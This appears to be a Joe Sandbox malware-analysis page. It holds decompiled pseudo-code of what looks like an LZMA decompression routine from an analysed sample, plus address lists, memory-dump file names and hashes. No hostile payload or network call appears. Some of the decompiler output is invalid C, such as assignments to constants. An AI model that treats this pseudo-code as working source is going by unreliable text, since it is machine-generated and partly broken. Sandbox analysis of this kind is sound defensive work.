									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406bc0
0x00406bc7
0x00406bcd
0x00406bd3
0x00000000
0x00406bd7
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c0e
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c59
0x00406c5c
0x00406c84
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c76
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406ccd
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d35
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073dd
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x00407413
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743b
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406dcf
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
